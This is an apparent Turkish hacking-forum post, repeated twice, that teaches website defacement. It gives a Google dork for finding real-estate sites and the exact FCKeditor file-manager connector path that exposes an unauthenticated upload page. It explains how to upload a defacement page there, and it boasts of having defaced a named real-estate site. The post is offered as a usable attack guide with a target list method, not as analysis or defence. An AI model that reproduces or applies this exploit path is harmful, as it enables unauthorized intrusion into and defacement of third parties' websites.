Hata Yapmayayım Diye Bu Konuyu Ve Bu Konuya Benzer Bir Araştırma Yaptım Ama BuLamadım Forumda O Yüzden Bende PayLaşmak İstedim Umarım YararLı OLur .
Forumda Varsada Kusura Bakmayın Şimdiden ..
Dork ; advert_detail.php?id=
ExpLoit ; admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Dork'u GooqLede Arattıqımız Zaman . Çıkan EmLak SiteLeridir Çoqu . Birine Giriyoruz..
Çınarbaba emlak Örnek Bu Siteyi ELe ALdım Ben ..
Sitenin Sonuna "admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php"
Bu Kodu Yapıştırıyoruz ve FCKeditor Sayfası GeLiyor . Göz At Kısmından İndex'imizi Seçip UpLoad EdebiLiriz ..
İndeximizin Gittiqi Yer ; www.site.com/files/indexadı
Örnek ; HaCKeD By _DeLi-DiVaNe_
K.bakmayın Bazı Pkk'Lı ArkadaşLar Tarafından ELe GeçiriLmişti ..
HataLar İçin Kusura Bakmayın ..:RpS_smile:
Forumda Varsada Kusura Bakmayın Şimdiden ..
Dork ; advert_detail.php?id=
ExpLoit ; admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Dork'u GooqLede Arattıqımız Zaman . Çıkan EmLak SiteLeridir Çoqu . Birine Giriyoruz..
Çınarbaba emlak Örnek Bu Siteyi ELe ALdım Ben ..
Sitenin Sonuna "admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php"
Bu Kodu Yapıştırıyoruz ve FCKeditor Sayfası GeLiyor . Göz At Kısmından İndex'imizi Seçip UpLoad EdebiLiriz ..
İndeximizin Gittiqi Yer ; www.site.com/files/indexadı
Örnek ; HaCKeD By _DeLi-DiVaNe_
K.bakmayın Bazı Pkk'Lı ArkadaşLar Tarafından ELe GeçiriLmişti ..
HataLar İçin Kusura Bakmayın ..:RpS_smile: